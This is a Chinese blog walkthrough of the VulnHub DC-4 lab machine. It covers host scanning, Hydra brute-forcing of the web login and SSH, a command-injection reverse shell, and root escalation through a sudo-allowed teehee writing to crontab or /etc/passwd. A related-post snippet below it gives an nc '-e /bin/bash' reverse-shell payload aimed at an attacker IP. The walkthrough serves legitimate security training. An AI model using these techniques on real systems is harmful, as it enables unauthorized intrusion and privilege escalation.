DC-4

最新推荐文章于 2022-10-04 16:49:24 发布
最新推荐文章于 2022-10-04 16:49:24 发布
阅读量131 收藏
点赞数 1
分类专栏: 靶机实战——DC系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/101603489
版权

1、arp-scan -l 发现目标主机

在这里插入图片描述

2、nmap -sS -Pn -A -p- -n 192.168.168.200 扫描目标主机

在这里插入图片描述
开放端口:80、22ssh(可以考虑ssh爆破)

3、访问一下ip,得到一个登录页面,的都是

在这里插入图片描述

4、考虑一下ssh爆破

随便提交一组用户名、密码,url为192.168.168.200/login.php
九头蛇爆破用户admin 密码happy
在这里插入图片描述
5、尝试登录一下,发现可以执行命令
在这里插入图片描述

6、抓个包看一哈子

导入到Repeater模块,写入反弹shell
在这里插入图片描述

7、kali开启监听

在这里插入图片描述

8、开启一个交互式界面

python -c 'import pty;pty.spawn("/bin/bash")'

9、查看家目录

在这里插入图片描述
10、切换到用户jim,找到一份密码备份文件
在这里插入图片描述

11、生成密码字典dc4-password.txt,进行SSH爆破

爆破出用户名jim,密码jibril04

12、ssh远程登录用户jim

在这里插入图片描述
查看一下邮件cd /var/mail
ls
在这里插入图片描述
发现新用户Charles,密码^xHhA&hvim0y

13、切换到用户charles

在这里插入图片描述
sudo -l 查看一下,发现teehee是root权限,且不需要密码
在这里插入图片描述

14、写入任务计划,提权
查看一下teehee的用法,发现可以写入

在这里插入图片描述
分 时 日 月 星期 MAILTO 命令 脚本路径
MAILTO变量指定了crond的任务执行信息将通过电子邮件发送给root用户,如果MAILTO变量的值为空,则表示不发送任务执行信息给用户
在这里插入图片描述

15、或者使用teehee加入新用户,将其uid,gid值为0,即root权限写入/etc/passwd,覆盖原来的root用户

在这里插入图片描述

per_se_veran_ce
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4047
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC-DC PCB layout 指导.docx
06-18
4. 使用铺铜的方式走线,可以减少阻抗和寄生电感,提高 DC-DC 的性能。 5. 单点接地单点接地,指的是信号地和功率地进行单点接地,功率地上会有比较大的开关噪声,因此需要尽量避免对敏感小信号造成干扰。 6. 在...
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3619
DC-4靶机渗透测试详细教程
dc-4 靶机渗透学习
..
03-19 3033
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2251
vulnhub DC-4靶机实战
DC-4靶机渗透测试
qq_60463414的博客
07-07 2361
DC4靶机shell反弹,提权流程。
靶机5 DC-4(过程超详细)
honest_gg的博客
09-26 1530
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-4靶场渗透】
一纸荒芜的博客
07-04 2063
DC-4渗透
DC-4靶场实战详解
a310034188的博客
02-28 2608
DC-4靶场实战详解
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3675
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1568
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
dc-vue:基于VueCli4.xx和DC-SDK构建的三维应用脚手架,用于开发三维WebGis项目
02-14
"dc-vue"是一个专为开发三维WebGIS项目的脚手架,它基于Vue CLI 4.x版本,并集成了DC-SDK。这个框架的目的是简化和加速开发者构建WebGIS应用程序的过程,使得用户能够更加高效地创建复杂的3D地理信息系统。 Vue CLI...
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
DC-4靶机提权超详细过程
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
工程力学64 第6章 弯曲内力1.PPT
最新发布
07-04
工程力学64 第6章 弯曲内力1.PPT
迪卡侬鸿福店的4P营销策略浅析6 毕设.docx
07-04
迪卡侬鸿福店的4P营销策略浅析6 毕设.docx
移动开发/安卓开发+影评APP+java
07-04
写在开头:代码部分仍有没用实现的功能,可以借鉴参考实现所有功能或添加其他功能 1.App的需求分析 1.1背景 开发影评APP的背景源于人们对电影信息和观影体验的需求。随着互联网和智能手机的普及,越来越多的人在选择观看电影之前希望能够获取更多的信息和其他用户的评价。影评APP应运而生,旨在为用户提供一个方便快捷的平台,让他们可以浏览电影信息、阅读影评、获得推荐,并与其他影迷进行交流和讨论。 1.2需求分析 (1)用户注册和登录:用户能够注册账号,并通过登录来访问APP的功能和内容。 (2)电影信息展示:电影名称、电影海报、导演、演员表、剧情简介、上映日期等。 (3)用户可以查看其他用户的影评和评分。 (4)用户可以撰写自己的影评并给电影打分。 (5)用户可以通过关键词搜索电影,并可以根据不同的条件(如类型、地区、年份)进行筛选。
2024年欧洲建筑化学品市场主要企业市场占有率及排名.docx
07-04
2024年欧洲建筑化学品市场主要企业市场占有率及排名
MIC5129 datasheet,dc-dc模块
11-11
MIC5129 datasheet,dc-dc模块

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值